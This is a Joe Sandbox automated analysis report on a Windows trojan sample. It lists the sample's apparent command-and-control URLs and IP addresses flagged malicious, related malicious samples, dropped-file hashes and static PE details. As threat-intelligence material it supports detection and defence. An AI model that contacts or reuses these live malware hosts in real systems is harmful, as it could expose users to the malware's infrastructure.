https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000008.00000002.322101318.000001842483D000.00000004.00000001.sdmp	false		high
http://162.241.92.219:8080/YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/J=c	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://79.98.24.39/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp, Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp, Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.511264828.000000000018D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000008.00000003.313490070.0000018424848000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/H	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://94.49.254.194/vHzRXBVyW/b13Sx2TCD/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000003.421590586.0000000002690000.00000004.00000001.sdmp, Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.512060995.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp, Windows.System.Profile.RetailInfo.exe, 0000000A.00000003.483856235.0000000002692000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000008.00000003.313596408.0000018424841000.00000004.00000001.sdmp	false		high
http://94.49.254.194/vHzRXBVyW/b13Sx2TCD/n	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://91.231.166.124:8080/pvpiKpofI5CEEveCsq/G	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000003.313529689.000001842485D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000008.00000003.291200341.0000018424832000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000008.00000003.313596408.0000018424841000.00000004.00000001.sdmp	false		high
https://activity.windows.comds	svchost.exe, 00000006.00000002.512143307.0000017925843000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://91.231.166.124/pvpiKpofI5CEEveCsq/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.512060995.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://94.49.254.194/vHzRXBVyW/bm	Windows.System.Profile.RetailInfo.exe, 0000000A.00000003.421622177.0000000002692000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000008.00000002.321969283.0000018424813000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000002.322101318.000001842483D000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/E	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000003.313565303.0000018424840000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000008.00000002.322101318.000001842483D000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.	svchost.exe, 00000004.00000002.512164511.00000196D16B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://94.49.254.194d	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000003.313565303.0000018424840000.00000004.00000001.sdmp	false		high
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/0	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000004.00000002.513741731.00000196D6C99000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000008.00000002.322194399.000001842485A000.00000004.00000001.sdmp	false		high
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/04u%04u%04u%03u	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.512060995.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000002.322101318.000001842483D000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.321969283.0000018424813000.00000004.00000001.sdmp	false		high
http://94.49.254.194	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 00000006.00000002.512143307.0000017925843000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.313490070.0000018424848000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.291200341.0000018424832000.00000004.00000001.sdmp	false		high
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/R	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000002.322194399.000001842485A000.00000004.00000001.sdmp	false		high
http://79.98.24.39:8080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/#	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000008.00000003.313210088.0000018424863000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.313529689.000001842485D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/enumeration/E	svchost.exe, 00000004.00000002.512164511.00000196D16B2000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000008.00000002.322075880.000001842483B000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000002.322194399.000001842485A000.00000004.00000001.sdmp	false		high
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513938842.000000000268E000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://activity.windows.com	svchost.exe, 00000006.00000002.512143307.0000017925843000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000008.00000003.313319464.0000018424860000.00000004.00000001.sdmp	false		high
http://212.51.142.238:8080/8eo0xZCOyvK/VXdfxUvyon7i/0	Windows.System.Profile.RetailInfo.exe, 0000000A.00000003.483856235.0000000002692000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://162.241.92.219:080/nqlXn6guO3P/JonayaNzsDdZJrNKjQ/	Windows.System.Profile.RetailInfo.exe, 0000000A.00000002.513892428.0000000002672000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 00000006.00000002.512143307.0000017925843000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000003.313529689.000001842485D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
41.60.200.34	unknown	Mauritius	30844	LIQUID-ASGB	true
79.7.158.208	unknown	Italy	3269	ASN-IBSNAZIT	true
162.154.38.103	unknown	United States	10796	TWC-10796-MIDWESTUS	true
201.173.217.124	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
91.205.215.66	unknown	Netherlands	61349	MAXITELNL	true
109.117.53.230	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
169.239.182.217	unknown	South Africa	37153	xneeloZA	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
190.108.228.62	unknown	Argentina	27751	NeunetSAAR	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
95.9.185.228	unknown	Turkey	9121	TTNETTR	true
108.26.231.214	unknown	United States	701	UUNETUS	true
24.1.189.87	unknown	United States	7922	COMCAST-7922US	true
200.41.121.90	unknown	Argentina	52444	PogliottiPogliottiConstruccionesSAAR	true
93.51.50.171	unknown	Italy	12874	FASTWEBIT	true
116.203.32.252	unknown	Germany	24940	HETZNER-ASDE	true
5.196.74.210	unknown	France	16276	OVHFR	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
79.98.24.39	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
200.55.243.138	unknown	Argentina	27988	ServiciosyTelecomunicacionesSAAR	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.241.92.219	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
75.139.38.211	unknown	United States	20115	CHARTER-20115US	true
31.31.77.83	unknown	Czech Republic	197019	WEDOSCZ	true
104.131.44.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
87.106.136.232	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
153.126.210.205	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
91.231.166.124	unknown	Italy	198090	ASLIBRAIT	true
210.165.156.91	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
124.45.106.173	unknown	Japan	9595	XEPHIONNTT-MECorporationJP	true
73.11.153.178	unknown	United States	7922	COMCAST-7922US	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
209.182.216.177	unknown	United States	47869	NETROUTING-ASNL	true
37.187.72.193	unknown	France	16276	OVHFR	true
46.105.131.79	unknown	France	16276	OVHFR	true
212.51.142.238	unknown	Switzerland	13030	INIT7CH	true
139.130.242.43	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
186.208.123.210	unknown	Brazil	53162	VOIPGLOBESERVICOSDECOMMULTIMIDIAVIAINTERNETBR	true
190.160.53.126	unknown	Chile	22047	VTRBANDAANCHASACL	true
81.2.235.111	unknown	Czech Republic	24806	INTERNET-CZKtis238403KtisCZ	true
95.179.229.244	unknown	Netherlands	20473	AS-CHOOPAUS	true
109.74.5.95	unknown	Sweden	43948	GLESYS-ASSE	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
62.138.26.28	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
94.49.254.194	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	true
103.86.49.11	unknown	Thailand	58955	BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH	true
190.55.181.54	unknown	Argentina	27747	TelecentroSAAR	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
209.141.54.221	unknown	United States	53667	PONYNETUS	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
5.39.91.110	unknown	France	16276	OVHFR	true
185.94.252.104	unknown	Germany	197890	MEGASERVERS-DE	true
101.187.97.173	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
46.105.131.87	unknown	France	16276	OVHFR	true
108.48.41.69	unknown	United States	701	UUNETUS	true
104.236.246.93	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.86.205	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
93.156.165.186	unknown	Spain	12946	TELECABLESpainES	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	481919
Start date:	13.09.2021
Start time:	08:25:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8U5snojV8p (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@16/5@0/69
EGA Information:	Failed
HDC Information:	Successful, ratio: 48.1% (good quality ratio 29.8%) Quality average: 50.3% Quality standard deviation: 42.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 32 Number of non-executed functions: 388
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 13.107.5.88, 13.107.42.23, 20.199.120.182, 20.82.210.154, 20.199.120.151, 173.222.108.226, 173.222.108.210, 20.82.209.183, 80.67.82.235, 80.67.82.211, 40.112.88.60 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, l-0014.l-msedge.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:26:43	API Interceptor	2x Sleep call for process: svchost.exe modified
08:28:02	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
41.60.200.34	9cf2c56e_by_Libranalysis.exe	Get hash	malicious	Browse
	EfqSfexZsT.exe	Get hash	malicious	Browse
	http://ehitusest.eu/marketplacel/sites/r5zmfubb2b/	Get hash	malicious	Browse
201.173.217.124	PHvqpLRfRl.exe	Get hash	malicious	Browse
	NWMEaRqF7s.exe	Get hash	malicious	Browse
	9cf2c56e_by_Libranalysis.exe	Get hash	malicious	Browse
91.205.215.66	file1.exe	Get hash	malicious	Browse
109.117.53.230	T2PmJ0DZMa.exe	Get hash	malicious	Browse
	k9fhsVtIIN.exe	Get hash	malicious	Browse
	KofpdSgB7D.doc	Get hash	malicious	Browse
	http://sample.tri-comma.com/wp-admin/FILE/	Get hash	malicious	Browse
	Payroll Report.doc	Get hash	malicious	Browse
	http://atcsagacity.com/wp-admin/MYWZIKG/eigyho/s9w0816332646203713g44z0n2u/	Get hash	malicious	Browse
	Form.doc	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASN-IBSNAZIT	p0zDxJeEqa	Get hash	malicious	Browse	82.55.100.117
	ccvgtVRQBx	Get hash	malicious	Browse	87.7.202.177
	omuCbLDC5Q	Get hash	malicious	Browse	79.52.184.242
	inyBB73iz3	Get hash	malicious	Browse	88.43.100.166
	p4vXpD0P73	Get hash	malicious	Browse	87.27.137.250
	j3LQELTT0m	Get hash	malicious	Browse	88.37.5.70
	BLBHEA8knd	Get hash	malicious	Browse	94.92.244.39
	mips	Get hash	malicious	Browse	194.243.251.210
	x86_64	Get hash	malicious	Browse	88.41.46.16
	arm	Get hash	malicious	Browse	85.39.249.165
	W53ieNnm24	Get hash	malicious	Browse	94.82.89.66
	fk8YZet4QU	Get hash	malicious	Browse	95.245.119.140
	O1qCIp2iQS	Get hash	malicious	Browse	82.63.40.218
	ICmyQqyEQF	Get hash	malicious	Browse	94.87.100.175
	4nLik56DrD	Get hash	malicious	Browse	88.39.175.15
	loligang.arm	Get hash	malicious	Browse	80.17.122.71
	BcOfN2cD3e	Get hash	malicious	Browse	88.46.36.181
	F7jEhjA0A4	Get hash	malicious	Browse	79.3.92.223
	jKira.x86	Get hash	malicious	Browse	85.47.26.25
	sro4ML7u8y	Get hash	malicious	Browse	88.43.235.112
LIQUID-ASGB	Darknet.arm7	Get hash	malicious	Browse	152.109.135.79
	EHqBakwhNU	Get hash	malicious	Browse	152.108.111.162
	tW7pu9B8A0	Get hash	malicious	Browse	152.109.160.89
	Qgqd0tcm4i	Get hash	malicious	Browse	41.175.162.104
	L5KEcDLI8h	Get hash	malicious	Browse	152.109.38.180
	sora.x86	Get hash	malicious	Browse	41.175.162.160
	44JDc6Ejh3	Get hash	malicious	Browse	41.60.238.129
	7fic3HM8I3	Get hash	malicious	Browse	41.175.162.175
	b3astmode.arm	Get hash	malicious	Browse	41.60.238.128
	h6GlKA1PNT	Get hash	malicious	Browse	41.60.238.111
	SFmCd24Ihh	Get hash	malicious	Browse	41.60.238.122
	mxGO7g3ASl	Get hash	malicious	Browse	152.108.7.127
	8BzsRiOWfD	Get hash	malicious	Browse	41.175.162.168
	3VTGcMPqtb	Get hash	malicious	Browse	196.201.228.22
	EtNIxD2GSD	Get hash	malicious	Browse	41.175.162.139
	AEOjFHGJAr	Get hash	malicious	Browse	152.108.246.114
	NQrs7jd2jx	Get hash	malicious	Browse	152.108.116.84
	l2PZQOX6JS	Get hash	malicious	Browse	41.175.220.250
	hH3nPDxZU4	Get hash	malicious	Browse	41.175.162.126
	SQCRu7Fwjk	Get hash	malicious	Browse	152.108.59.164

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5981930978381301
Encrypted:	false
SSDEEP:	6:0F/k1GaD0JOCEfMuaaD0JOCEfMKQmDyh/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:06GaD0JcaaD0JwQQq/tAg/0bjSQJ
MD5:	56236FF4BBAE658F479447A7052DCFC7
SHA1:	9B1497085FEA378BF2288523510D843B3E126C67
SHA-256:	FB5F1F768813FF5A475A3AA36BF8F0F1CABAE97DADF6F327491EF88422D89B5D
SHA-512:	D7A0F92D0EE6B9590E3B454F2AD0ACD661F48EED58CBDC52F2DA60FD250991230C09B13308F7997618F09F9668745550DF6EC794924AB0E6649B8E78F70F74CA
Malicious:	false
Preview:	......:{..(.....+....yq.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................+....yq...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x2548ab78, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09699014067399726
Encrypted:	false
SSDEEP:	12:C0+flXO4bllDShUKs0+flXO4bllDShUK:l7r7
MD5:	17E96F81CB4ED102FE6794C97156C599
SHA1:	48C855E6B2FCB9D2334072149A0A6899884D6A36
SHA-256:	C4FD34A8804736E67F8F3F4B742E0BB399F18C951B7D4354109B5317F916DE07
SHA-512:	49C94E40BF68807280C20B2E2ECE2C62F1FEAFC55985F9CC1313D3F55FB3FE5591F1941CF16CB2E63E81B4EC0D9A1FC42FDDE49FAA8C42D2044EA1636A01EB13
Malicious:	false
Preview:	%H.x... ................e.f.3...w........................&..........w..+....yq.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................Z.+....yq..................T..+....yq.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11183082918031642
Encrypted:	false
SSDEEP:	3:9LEvOYckAl/bJdAtiSaqdqll:4OnkAt4lhI
MD5:	7E0904102FD33FD23326DB4DF08003A0
SHA1:	2E86EB389DEA1F87DCA63AF1184D2D53579E0180
SHA-256:	4AEE317E782E3C6EB4570DE9711355B880B38297D3A6705A5CD830381AB9D860
SHA-512:	090C39E0738006E8FA85556984855E0F8AF8BA067374BF3B0D4C55BF18A0973ABB19B408946533B47AECB41026F1FFA3315601F10ED5701F1ED02C01898652BD
Malicious:	false
Preview:	...<.....................................3...w..+....yq......w...............w.......w....:O.....w...................T..+....yq.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.13559259607017
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3r8wwd0hk9+MlWlLehB4yAq7ejC1wwd0g:OaqdmuF3r87+kWReH4yJ7MER
MD5:	F5E08478EE8F48C831ACC6F53CA84BBC
SHA1:	3314F984C9CF17666EE9FD301A592A2BD617928C
SHA-256:	00AB2B92D4FB3D38728C216E6C509D862AEBEBD035BA5FC4B2874E99BE2D8A1D
SHA-512:	4DBB548ABF8252DDEAFAE8CC75D65E7DFC2E10FA2454334CFF7E9B44CC9634692C39C3C6944A665C6AB6B198D7EB816F71ACAEA127233FB3A6D65145AD75BEFA
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. S.e.p. .. 1.3. .. 2.0.2.1. .0.8.:.2.8.:.0.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. M.o.n. .. S.e.p. .. 1.3. .. 2.0.2.1. .0.8.:.2.8.:.0.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.469499917718991
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8U5snojV8p.exe
File size:	643178
MD5:	0df4aaffd21acf21ff44429ca485fab8
SHA1:	6915e92d42c5588b8fb254b6e7f69fcefc8d5c82
SHA256:	3147bee916b63c96acc5fb06cac93846d13bb44804931f390f66348abf603941
SHA512:	4542d356e0ae64b05085763024ffee678cffd50655d30470b99b70b4be4398a92596d599bffd6841b16ec77e63f84e19600768d58314602f1e04ec6231464cde
SSDEEP:	6144:h5FdA9+3bkRQIwYEgRy2k46fifql0B1V8fLzaWSTm3nxyhXU:hvdA9SGh9rBylaeatTYnxn
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A...A...L...#...O.......C.......J.......F...A...........c.......@...RichA...........PE..L....5._...................

File Icon


Icon Hash:	70ecccf80af8ae87

Static PE Info

General
Entrypoint:	0x426a4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
